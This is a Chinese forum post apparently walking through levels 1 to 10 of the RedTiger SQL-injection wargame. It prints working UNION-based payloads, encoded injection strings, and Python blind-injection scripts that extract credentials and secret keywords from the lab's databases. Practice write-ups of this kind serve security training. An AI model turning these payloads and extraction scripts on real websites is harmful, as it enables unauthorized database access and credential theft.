|
Level 1 普普通通的一个注入关,直接构造语句即可 https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
Level 2题目说,一个简单的密码绕过,那就简单一下试试,sql万能密码 绕过成功 Level 3尝试出个错误...也是醉了
那我们就出个错瞧瞧~
尝试是否为sqli,但是sql无错误回显,考虑php原因
直到 才显示出来一个错误
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/hackit/urlcrypt.inc on line 21
因为.inc这种文件可以访问,所以我们获得了一部分源码 <?php function encrypt($str) { $cryptedstr =""; for($i =0; $i < strlen($str); $i++) { $temp = ord(substr($str,$i,1))^192; while(strlen($temp)<3) { $temp ="0".$temp; } $cryptedstr .= $temp.""; } return base64_encode($cryptedstr); } function decrypt ($str) { if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str)) { $str = base64_decode($str); if($str !=""&& $str !=null&& $str !=false) { $decStr =""; for($i=0; $i < strlen($str); $i+=3) { $array[$i/3]= substr($str,$i,3); } foreach($array as $s) { $a = $s^192; $decStr .= chr($a); } return $decStr; } returnfalse; } returnfalse; } ?>
在这个文件中,给出了对usr这个参数的加密和解密方式,所以,我们用这个加密方式加密我们的语句,得到最终的POC https://redtiger.labs.overthewire.org/level3.php ?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjI0
Level 4点了一下Click me,下面显示了 Query returned 1 rows.
加个单引号变为了 Query returned 0 rows.
所以应该是盲注了 order by表示有两个column,虽然也没啥用..先来判断长度 https://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword ,1 from level4_secret where length(keyword)=17 一共17个字节,这次肯定不是MD5。。。 写脚本,从A-Z a-z 0-9跑一遍,得出最终结果
# -*- coding: utf-8 -*- import requests s = requests.Session() result ="" login ={'password':'dont_publish_solutions_GRR!', 'level4login':'Login'} for x in range(1,17): flag =True url ="http://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword,1 from level4_secret where SUBSTR(keyword,%d,1)='%s'" for i in range(ord('a'),ord('z')+1): if(flag ==False): break test_url = url %(x,chr(i)) r = s.post(test_url, data = login) if"2 rows"in r.content: result = result + chr(i) flag =False for i in range(ord('A'),ord('Z')+1): if(flag ==False): break test_url = url %(x,chr(i)) r = s.post(test_url, data = login) if"2 rows"in r.content: result = result + chr(i) flag =False for i in range(ord('0'),ord('9')+1): if(flag ==False): break test_url = url %(x,chr(i)) r = s.post(test_url, data = login) if"2 rows"in r.content: result = result + chr(i) flag =False print result print result
Level 5还是登录绕过,禁用了几个函数,而且不是盲注,让我们关注看报错信息 通过最终的结果的行数,判断是否登录成功所以我们的POC Level 6Target: Get the first user in table level6_users with status 1
先查status 1 就是普普通通的注入,没啥难度
POC https://redtiger.labs.overthewire.org/level6.php?user=0%20union%20select%201,0x2720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f75736572732077686572652069643d33202d2d20,1,1,1%20from%20level6_users%20where%20status=1
Level 7又是盲注,但是这次出在了搜索的位置,限制更加严格,所以我们换个关键字..
所以我们还是和上面某Level一样的思路
再次编程 # -*- coding: utf-8 -*- import requests s = requests.Session() result ="" login ={'password':'dont_shout_at_your_disks***', 'level7login':'Login', 'dosearch':'search!'} for x in range(1,17): flag =True url ="http://redtiger.labs.overthewire.org/level7.php" for i in range(32,127): if(flag ==False): break login["search"]="google%%' and locate('%s',news.autor COLLATE latin1_general_cs)=%d and '%%'='"%(chr(i), x) r = s.post(url, data = login) if"FRANCISCO"in r.content: result = result + chr(i) flag =False print result print result
上面这段代码貌似有点小问题 Level 8加了一个' 爆出了错误,明显是error base Level 9依旧是error base
通过一个' 判断注入出现在textarea中,于是构建语句 过关 Level 10只给了一个Login按钮,通过抓包,我们看到了一个base64加密过得json
解密得到
|
发表于 2015-8-16 21:18:27